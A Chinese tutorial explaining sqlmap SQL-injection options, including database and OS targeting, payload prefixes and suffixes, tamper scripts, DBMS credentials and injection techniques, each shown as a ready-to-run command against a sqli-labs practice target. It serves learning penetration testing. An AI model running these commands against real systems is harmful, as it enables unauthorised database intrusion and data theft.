您好,登录后才能下订单哦!
这篇文章将为大家详细讲解有关如何解析sqlmap注入参数,文章内容质量较高,因此小编分享给大家做个参考,希望大家阅读完这篇文章后对相关知识有一定的了解。
一、指定数据库类型 --dbms
http://192.168.1.121/sqli/Less-1/?id=1&&name=2 --dbms mysql --dbs
二、指定操作系统 --os
http://192.168.1.121/sqli/Less-1/?id=1&&name=2 --os windows --dbs
三、解决编码问题
将所有结果转换为字符串,并用空格替换NULL结果 --no-cast
四、关闭字符串转义机制
--no-escape
五、设置无效值替换
--invalid-bignum 大整数替换
--invalid-logical 布尔操作替换
--invalid-string 随机字符串替换
六、自定义注入负载位置
--prefix 设置前缀
--suffix 设置后缀
sqlmap -u "http://192.168.1.121/sqli/Less-1/?id=1" --prefix="')" --suffix="and ('abc'='abc" --dbs
payload:id=('1') and ('abc'='abc')
七、设置tamper脚本
sqlmap -u "http://192.168.1.121/sqli/Less-1/?id=1" --tamper "least.py,varnish.py" --dbs
八、设置dbms认证
sqlmap -u "http://192.168.1.121/sqli/Less-1/?id=1" --dbms-cred="root:root" --dbs
九、设置具体sql注入技术
--technique B 布尔盲注
--technique E 报错注入
--technique U union查询注入
--technique S 堆叠注入
--technique T 时间盲注
--technique Q 内联查询注入
sqlmap -u "http://192.168.1.121/sqli/Less-1/?id=1" --technique T --time-sec 3 --dbs
--time -sec 时间盲注时间为3
十、指定union字段数
sqlmap -u "http://192.168.1.121/sqli/Less-1/?id=1" --union-cols 12-18 --dbs
十一、指定union字符,默认是null
sqlmap -u "http://192.168.1.121/sqli/Less-1/?id=1" --union-char aaa --dbs
关于如何解析sqlmap注入参数就分享到这里了,希望以上内容可以对大家有一定的帮助,可以学到更多知识。如果觉得文章不错,可以把它分享出去让更多的人看到。
免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。